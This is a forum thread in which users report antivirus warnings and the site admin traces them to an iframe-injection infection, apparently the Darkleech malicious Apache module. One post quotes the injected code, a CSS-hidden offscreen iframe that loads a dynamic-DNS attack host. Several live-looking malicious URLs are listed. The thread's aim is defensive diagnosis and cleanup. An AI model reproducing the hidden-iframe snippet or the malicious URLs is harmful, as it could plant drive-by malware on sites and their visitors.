Each time I check the Page Source, via my browser, the offending URL is found to be within the Head HTML tag.
Is anybody else getting these warnings and is there anything being done about this?
The warning came up when I visited this thread: Thread 126922
Though visiting the page now doesn’t result in the warning being displayed.
Also it’s now not shown in the page source hence it seems to be loaded into random pages at random times.
Any idea how it got into the code?
uptown: still looking into that
*Takes a look at the "Not completely about cats" thread.
I can see why Avast hates us.
I am an "avaster" as well, and yes, from time to time when logging in here, avast tells me it found malware. I am in no specific thread then, just logging in.
Has not happened the past few days.
1) write down the exact url that it’s found at and put it in here
2) save the page and post it here or send it to my email ([email protected])
will help me diagnose this. thanks !
1) write down the exact url that it’s found at and put it in here
2) save the page and post it here or send it to my email ([email protected])
will help me diagnose this. thanks !
I wish Avast would let you copy the URL from its shield, but strangely it doesn’t. You can only view the last blocked URL too.
if anyone’s still getting this let me know, thanks
I’m not sure about other people’s antivirus programs, but for mine, Webroot SecureAnywhere, it appears to be some kind of long number sequence exe virus that tries to attack my AppData folder, that’s why it’s detecting it, the virus tried to strike 4 times just now according to my Quarantine log. Looking at my quarantine log, that’s what the virus has been when it tries to attack when I log in here every once in a while. I don’t know what to tell you or where it originated from! So sorry this is happening, gotta be frustrating. 🙁
Due to this in the head tag of the source code:
< style>.k8oj1h { position:absolute; left:-1813px; top:-1675px} < /style> < div class="k8oj1h">< iframe src="http://dimcuzvl.myftp.biz/2bwo0mzxw2mn32nv/dd23f248a65be260db78b1a1101d8116/" width="381" height="392">< /iframe>< /div>
http://gcrulysz.myvnc.com/ygikekzxwf0vy/dd23f248a65be260db78b1a1101d8116/
It blocked this adress:
http://rouhyrdhw.servehttp.com/srkdwzxwu…
It was in the forum front page with 30 threads per page.
AVG detects the problem as Invisible IFrame Injection (type 1707). The injection on my last visit was as follows:
(edit: code removed due to false positives)
And the injection on my visit before that was (differences in red):
(edit: code removed due to false positives)
Please don’t visit the above URLs! Anyway, you’re looking for malicious code that randomizes a few bits, fetches the current attack url (which probably changes every few minutes) from an outside control server, then injects the iframe code for that url, with css to shift it out of view. Good luck!
Can anybody please look into it?
(http://imageshack.us/photo/my-images/96/51361777.jpg/)
Uploaded with ImageShack.us (http://imageshack.us)
Can anybody please look into it?
(http://imageshack.us/photo/my-images/96/51361777.jpg/)
Uploaded with ImageShack.us (http://imageshack.us)
Same here. :confused:
(not including opera warnings– those will take a while to go away)
(not including opera warnings– those will take a while to go away)
Good to know you’re on the ball about this; I am curious as to whether you’ve been able to contact the relevant folks at Opera and explain what you’ve done to address the issue.
It popped up when I visited this page.
Same iframe insertion as before but with a different URL:
http://bjxbalhswd.sytes.net/rewvp1zxwxliibene/dd23f248a65be260db78b1a1101d8116/
I found that the security folks at Unmask Parasites have run into this critter before. They tracked it down to a malicious Apache module, which explains the server-wide infection. The intruder got root access to put it there, and you’ll need root access to clean it. Check the below link for help.
Malicious Apache Module Injects Iframes (http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/)
and thanks for the detective work 🙂
I found that the security folks at Unmask Parasites have run into this critter before. They tracked it down to a malicious Apache module, which explains the server-wide infection. The intruder got root access to put it there, and you’ll need root access to clean it. Check the below link for help.
Malicious Apache Module Injects Iframes (http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/)
doing a fresh install of apache and changing root passwords, let me know again if you still get the warnings
and thanks for the detective work 🙂
Is that what caused me to get this (Thread 129326) a while ago?
My pleasure. I think you’re clean.
When you’re feeling confident, you can go through Google webmaster tools (http://www.google.com/webmasters/tools/) to get the following blacklisted pages rechecked:
http://forums.ffshrine.org/f72/idolm-ster-master-artist-albums-44223/56.html
Thread 68358
Is that what caused me to get this a while ago?
Yup. Hug your antivirus. Hidden iframes are only used for evil, but not all AVs are equally good at detecting them. Anyone whose AV has complained about iframes on this site is fine. Anyone whose AV hasn’t complained about iframes on this site (i.e., let the iframe through) should run a scan, just in case one slipped through the blacklists.
When you’re feeling confident, you can go through Google webmaster tools (http://www.google.com/webmasters/tools/) to get the following blacklisted pages rechecked:
http://forums.ffshrine.org/f72/idolm-ster-master-artist-albums-44223/56.html
Thread 68358
Oh, I wasn’t worried. AVG blocked the threat. I was just curious if what you mentioned is what caused that.
i had spent so many hours looking through the vb code it never occurred to me it could’ve been apache itself D:
i had spent so many hours looking through the vb code it never occurred to me it could’ve been apache itself D:
Is that why AVG just blocked another iFrame? Because Google still has it listed as dangerous?
Keep up the good work, Sarah. 🙂
Anyway, some more info for you: The sec folks call this infection Linux/Chapro.A, the underground calls it Darkleech. It’s been around a few months, so maybe a Linux AV program can help with the cleaning.
out of curiosity what do you do for a living xD surprised anyone on here knows this much about this stuff
out of curiosity what do you do for a living xD surprised anyone on here knows this much about this stuff
Do you think it’d be a good idea to close down the forum until you get rid of this, Sarah? And I don’t mean simply turning it off via vBulletin so we see the "off" message, but actually making it non-accessible.
As Eastern West pointed out, not all virus programs catch this, so some people could run into problems.
I’m in environmental health, going back to grad school for my MPH in epidemiology soon. Malware outbreaks are good practice for real world ones.
Edit: No warnings from Firefox.http://smileys.on-my-web.com/repository/Happy/happy-thumb-up-045.gif
Note: Using Firefox
Note: Using Firefox
Try clearing your data.
Getting the same with IE…… What Data am I supposed to try clearing?
Getting the same with IE…… What Data am I supposed to try clearing?
Says Iframe infection.
Says Iframe infection.
Browser data.
You might be stuck from when it had the problem.
I’m guessing it may be due to the snippet of code I or someone else posted demonstrating the original issue we had.
I’m guessing it may be due to the snippet of code I or someone else posted demonstrating the original issue we had.
Yeah that page is still blocked out for me as well!
Good catch. I edited my post, hopefully that’ll prevent false positives from Avast.
Web Hosting, Shared Web Hosting, Virtual Private Server, Dedicated Servers by DreamHost ()
Looks fine to me. Are you sure your machine is clean? It looks like a spam link got inserted into your post.